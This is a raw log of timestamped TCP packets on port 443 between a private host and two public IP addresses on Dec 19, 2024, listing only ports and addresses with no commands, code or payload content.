                                                                                              Dec 19, 2024 14:36:02.613970995 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.614031076 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.614047050 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.614109039 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.618741989 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.618750095 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.618802071 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.628094912 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.628102064 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.628146887 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.637218952 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.637286901 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.642683029 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.642741919 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.758233070 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.758305073 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.765372992 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.765430927 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.769901991 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.769959927 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.776983976 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.777043104 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.780915022 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.780980110 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.788400888 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.788469076 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.795660973 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.795717955 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.803000927 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.803056002 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.807101965 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.807171106 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.810476065 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.810527086 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.810553074 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.810600996 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.810647011 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.810689926 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.810720921 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.810749054 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.810767889 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.815280914 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.815309048 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.815371037 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.815593958 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.815607071 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.836869955 CET49775443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:36:02.836901903 CET44349775172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.837095976 CET49775443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:36:02.837807894 CET49775443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:36:02.837824106 CET44349775172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.978838921 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.978863955 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.978981972 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.979310989 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.979331017 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:03.549987078 CET44349773104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:03.554157019 CET49773443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:03.554179907 CET44349773104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:03.555264950 CET44349773104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:03.556056976 CET49773443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:03.556185961 CET49773443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:03.556229115 CET44349773104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:03.603698015 CET49773443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.005166054 CET44349773104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.005343914 CET44349773104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.005455971 CET49773443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.005970955 CET49773443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.005987883 CET44349773104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.030421972 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.030688047 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.030699968 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.031811953 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.032269955 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.032331944 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.032443047 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.053489923 CET44349775172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.053719997 CET49775443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:36:04.053730965 CET44349775172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.057096958 CET44349775172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.057194948 CET49775443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:36:04.057715893 CET49775443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:36:04.057749987 CET49775443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:36:04.057791948 CET49775443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:36:04.057816982 CET44349775172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.057883024 CET49775443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:36:04.058157921 CET49781443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:36:04.058250904 CET44349781172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.058342934 CET49781443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:36:04.058649063 CET49781443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:36:04.058685064 CET44349781172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.078084946 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.190970898 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.191319942 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.191329956 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.191905022 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.192207098 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.192296028 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.192365885 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.192404985 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.192452908 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.471681118 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.472280025 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.472371101 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.472445965 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.472471952 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.472527027 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.473359108 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.474499941 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.474561930 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.474569082 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.482722044 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.482783079 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.482791901 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.491216898 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.491277933 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.491286039 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.538455009 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.591161013 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.632597923 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.632605076 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.676393032 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.676480055 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.676492929 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.683830976 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.683943033 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.683957100 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.686233997 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.686389923 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.686448097 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.686460018 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.687177896 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.687232018 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.687239885 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.691351891 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.691416979 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.691423893 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.694231987 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.694307089 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.694315910 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.698992968 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.699062109 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.699074030 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.702492952 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.702574015 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.702588081 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.710848093 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.710916996 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.710926056 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.713604927 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.713694096 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.713702917 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.721163034 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.721227884 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.721232891 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.728630066 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.728696108 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.728701115 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.735749960 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.735824108 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.735829115 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.743139029 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.743194103 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.743199110 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.750112057 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.750185966 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.750195026 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.754244089 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.754252911 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.757184982 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.757234097 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.757241964 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.764218092 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.764266968 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.764273882 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.795991898 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.805856943 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.814382076 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.860385895 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.866396904 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.868865967 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.868949890 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.868959904 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.875274897 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.875360012 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.875376940 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.877995014 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.882283926 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.882364035 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.882375002 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.885240078 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.885375977 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.885384083 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.885437965 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.889935017 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.889971018 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.890002966 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.890914917 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.890970945 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.890980005 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.898726940 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.898761988 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.898787975 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.898797035 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.898823023 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.899359941 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.899409056 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.899420977 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.907392025 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.907447100 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.907459021 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.907526016 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.915523052 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.915575027 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.915585041 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.915805101 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.915823936 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.915855885 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.923862934 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.923918009 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.923932076 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.924623966 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.924675941 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.924684048 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.924725056 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.929003954 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.929075956 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.932238102 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.932302952 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.932315111 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.937520981 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.937606096 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.940591097 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.940661907 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.940671921 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.945888042 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.945966959 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.948944092 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.949033976 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.949043989 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.950531006 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.950635910 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.955761909 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.955832958 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.955842972 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.958853960 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.958920002 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.962138891 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.962199926 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.962208986 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.967669964 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.967736006 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.967786074 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.967936039 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.967981100 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.968548059 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.968590975 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.968600988 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:04.987664938 CET49774443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:04.987677097 CET44349774104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.009936094 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.009944916 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.063636065 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.073390961 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.075865030 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.075922012 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.075938940 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.081104040 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.081147909 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.081163883 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.090594053 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.090652943 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.090662956 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.090720892 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.099911928 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.099921942 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.099962950 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.099972010 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.100028992 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.108896017 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.108916044 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.108959913 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.113847017 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.113908052 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.113917112 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.113972902 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.121704102 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.121711016 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.121756077 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.129751921 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.129813910 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.138227940 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.138289928 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.142765045 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.142823935 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.151206017 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.151266098 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.155463934 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.155514956 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.163952112 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.164007902 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.172023058 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.172077894 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.180710077 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.180807114 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.265778065 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.265903950 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.270669937 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.270795107 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.277515888 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.277625084 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.281039000 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.281136990 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.281306028 CET44349781172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.281624079 CET49781443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:36:05.281666040 CET44349781172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.282872915 CET44349781172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.283279896 CET49781443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:36:05.283463001 CET49781443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:36:05.283473015 CET44349781172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.283493996 CET44349781172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.287187099 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.287342072 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.290515900 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.290577888 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.296494961 CET44349776104.18.94.41192.168.2.6
